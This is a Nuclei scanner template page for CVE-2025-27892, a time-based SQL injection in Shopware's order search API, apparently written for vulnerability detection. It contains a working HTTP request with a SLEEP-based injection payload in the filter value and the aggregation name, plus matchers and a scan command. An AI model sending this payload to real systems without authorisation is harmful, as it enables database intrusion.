Shopware < 6.5.8.13 - SQL Injection

ID: CVE-2025-27892

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2025,shopware,sqli,time-based-sqli

Description

The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the “aggregations” object. The name field in this “aggregations” in nested object is vulnerable SQL-injection and can be exploited using SQL parameters.

YAML Source

id: CVE-2025-27892

info:
  name: Shopware < 6.5.8.13 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the "aggregations" object. The name field in this "aggregations" in nested object is vulnerable SQL-injection and can be exploited using SQL parameters.
  reference:
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2025-001/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-27892
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 6.8
    cve-id: CVE-2025-27892
    cwe-id: CWE-89
  metadata:
    max-request: 1
    vendor: shopware
    product: shopware
    verified: true
  tags: cve,cve2025,shopware,sqli,time-based-sqli

variables:
  token: "{{token}}"

http:
  - raw:
      - |
        @timeout: 30s
        POST /api/search/order HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
        Accept: */*
        Authorization: Bearer {{token}}
        Content-type: application/json

        {
          "filter": [
            {
              "type": "equals",
              "field": "transactions.stateMachineState.technicalName",
              "value": "paid` FROM `order`; SELECT SLEEP(7); -- "
            }
          ],
          "aggregations": [
            {
              "type": "histogram",
              "name": "order_sum_bucket",
              "field": "orderDateTime",
              "interval": "day",
              "aggregation": {
                "type": "sum",
                "name": "totalAmount ? ? --",
                "field": "amountTotal"
              }
            }
          ]
        }


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Warning: Undefined array")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 500'
          - 'duration>=5'
        condition: and
# digest: 4a0a00473045022100d5b44e901994841a784d7ac6a95d551d90fb1acfb9267cea1ed2675a9e9c17b80220280cb521315d19a7104a95cd317665f0836f2b376f01a2e7d758224e84b04178:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-27892.yaml"

View on Github